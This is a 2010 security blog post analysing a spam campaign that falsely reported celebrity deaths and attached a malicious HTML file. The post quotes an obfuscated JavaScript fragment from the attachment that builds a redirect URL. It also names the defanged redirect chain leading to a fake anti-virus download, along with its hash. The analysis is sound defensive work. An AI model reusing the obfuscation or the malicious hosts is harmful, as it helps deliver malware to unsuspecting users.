Anti Virus Softwares

  • Subscribe to our RSS feed.
  • Twitter
  • StumbleUpon
  • Reddit
  • Facebook
  • Digg

Saturday, 21 August 2010

"(Famous person) died" spam

Posted on 17:23 by Unknown
According to my spam inbox, today was a horrible day to be a celebrity:

Alicia Keys died
Angelina Jolie died
Beyonce Knowles died
Bon Jovi died
Brad Pitt died
Cameron Diaz died
David Beckham died
Gwen Stefani died
J.K. Rowling died
Jay-Z died
Jennifer Aniston died
Jennifer Lopez died
Johnny Depp died
Justin Timberlake died
Kanye West died
Madonna died
Miley Cyrus died
Nicole Kidman died
Oprah Winfrey died
Ronaldinho died
Tiger Woods died
Tom Cruise died

In the UAB Spam Data Mine we received between 450 and 539 copies of each of these spam messages.

The body of the email has the same text for each, with only the name varying. The name used in the body of the email doesn't necessarily match the name in the subject line. Here's an example:


Cameron Diaz died along with 34 other people when the Air Force CT-43 "Bobcat" passenger plane carrying the group on a trip crashed into a mountainside while approaching the Dubrovnik airport in Croatia during heavy rain and poor visibility.

Please see attachment


The attachment is called "News.html" is "base64" encoded, but if you click on it, it will launch in a web browser.

The HTML is composed of javascript functions which takes substrings of pieces of code and composes them together to make a URL:


new String("hre3y9b".substr(0,3)+"hv5f5hv".substr(3,1))]=
new String("http:P5v".substr(0,5)+ "//panHSOY".substr(0,5)+
"3aPiplusP3a".substr(3,5) + ".com.V4Hq".substr(0,5)+
"mx/1.0Xq".substr(0,5) + "HFkhtmlFHk".substr(3,4))


So, the "hre3y9b" becomes "hre" the "hv5f5hv" becomes an "f" for "href" etc . . .

It eventually turns into:

hxxp://paniplus.com.mx/1.html

(the "xx" instead of "tt" is to prevent this from being live)

That page has two URLs on it, one pointing to the free domain website 'cz.cc':

cetogilco.cz.cc / scanner10 / ?afid=24

This page goes to a fake anti-virus site . . .

The second URL points to:

analyticspool.in / wiki / index.php ?sid=151 &search=ecard &refresh=on


From cetogilco.cz.cc the file "antivirus.exe" is downloaded.

A VirusTotal Report for this malware, showing 18 of 41 detects, is available. The MD5 is cb38da67e9a96afb0b3674eddee26472.
Email ThisBlogThis!Share to XShare to FacebookShare to Pinterest
Posted in spam | No comments
Newer Post Older Post Home

0 comments:

Post a Comment

Subscribe to: Post Comments (Atom)

Popular Posts

  • From Russia, With Love . . . new Postcard spam spies on your PC
    Isn't it nice to have friends who send you postcards? The UAB Spam Data Mine is especially fortunate in that way. Beginning the evenin...
  • Happy New Year! Here's a Virus! (New Year's Postcard malware)
    I've been busy this week looking at the various defacements (see ComputerWorld , and ABC News ) and other cyber attacks (see yesterday...
  • ACH Spammer switches to Shortened URLs
    For many weeks now the spammers behind one particular malware family have been fighting a running battle to keep their malware-hosting domai...
  • Tempting Photo Attachments Lead to Fake AV
    One of today's largest malicious spam campaigns continued an occasional theme we've been seeing for a few weeks. A subject line, fo...
  • Indictments reveal $77 Million in Illegal Pill Sales
    Congratulations to the Daytona Beach FBI, US Attorney Robert O'Neill, and their colleagues at IRS and FDA. The Daytona Beach News report...
  • Most Dangerous Cities for Cyber Crime?
    Symantec Riskiest Cybercrime Cities Symantec released a study today in conjunction with Sperling's Best Places today. According to thei...
  • Morocco based "Team Evil" reroutes prominent Israeli websites
    After more than 10,000 websites being defaced in protest of Israeli actions in Gaza, Morrocco-based defacement team "Team Evil" ha...
  • Minipost: Google v. Pacific WebWorks
    I blogged recently about the "Google Jobs" scammers who were abusing Twitter, Blogspot, Google Reader, and spaces.live.com by crea...
  • New Year's Waledac Card
    We haven't seen a new version of Waledac since Independence Day (July 4, 2009), but it looks like its back! I'm on vacation today, s...
  • WIRED: November Jargon Watch & Forensics?
    One of my NASA buddies (hi, Lisa!) dropped by last week for coffee and to catch up on the world of information management. When I introduce...

Categories

  • Blogs
  • Calendar
  • china
  • Communities
  • computer security careers
  • conficker
  • cyberwar
  • digital certificates
  • Drivers
  • email
  • Excel 2007
  • facebook
  • fake av
  • Features
  • Firewall
  • Gadgets
  • gumblar
  • Hardware
  • Hotmail
  • IE7
  • Internet Explorer 7
  • koobface
  • law enforcement
  • malware
  • Microsoft
  • Outlook
  • pharmaceuticals
  • phishing
  • PowerPoint 2007
  • public policy
  • Ready Boost
  • ReadyBoost
  • Security
  • Sidebar
  • Software
  • spam
  • Tutorials
  • twitter
  • twitter malware
  • USB
  • Virtual PC
  • Vista
  • waledac
  • Wallpaper
  • Websites
  • Windows
  • Windows Live
  • Windows Vista
  • Word 2007
  • zbot

Blog Archive

  • ►  2013 (17)
    • ►  November (1)
    • ►  October (1)
    • ►  September (1)
    • ►  August (3)
    • ►  July (1)
    • ►  June (1)
    • ►  May (5)
    • ►  April (3)
    • ►  March (1)
  • ►  2012 (18)
    • ►  August (1)
    • ►  June (1)
    • ►  May (7)
    • ►  April (2)
    • ►  March (7)
  • ►  2011 (28)
    • ►  November (3)
    • ►  October (1)
    • ►  August (4)
    • ►  July (6)
    • ►  June (1)
    • ►  May (2)
    • ►  April (2)
    • ►  March (6)
    • ►  February (1)
    • ►  January (2)
  • ▼  2010 (80)
    • ►  December (6)
    • ►  November (10)
    • ►  October (6)
    • ►  September (12)
    • ▼  August (5)
      • Major Fraud Ring Busted in Largest Chinese Cybercr...
      • "(Famous person) died" spam
      • Viagra Spammers as Hackers?
      • Spam Campaign: Zeus's Greatest Hits spreads malware
      • PhacePhish: New Facebook Attack gives a One-Two Punch
    • ►  July (4)
    • ►  June (11)
    • ►  April (7)
    • ►  March (8)
    • ►  February (4)
    • ►  January (7)
  • ►  2009 (93)
    • ►  December (12)
    • ►  November (11)
    • ►  October (16)
    • ►  September (7)
    • ►  July (5)
    • ►  June (10)
    • ►  May (2)
    • ►  April (7)
    • ►  March (7)
    • ►  February (6)
    • ►  January (10)
  • ►  2008 (109)
    • ►  December (7)
    • ►  November (17)
    • ►  October (12)
    • ►  September (10)
    • ►  August (23)
    • ►  July (14)
    • ►  June (3)
    • ►  May (8)
    • ►  April (6)
    • ►  March (2)
    • ►  February (3)
    • ►  January (4)
  • ►  2007 (37)
    • ►  December (3)
    • ►  November (9)
    • ►  October (3)
    • ►  September (2)
    • ►  August (5)
    • ►  July (5)
    • ►  April (2)
    • ►  March (2)
    • ►  February (2)
    • ►  January (4)
  • ►  2006 (5)
    • ►  December (2)
    • ►  October (3)
Powered by Blogger.

About Me

Unknown
View my complete profile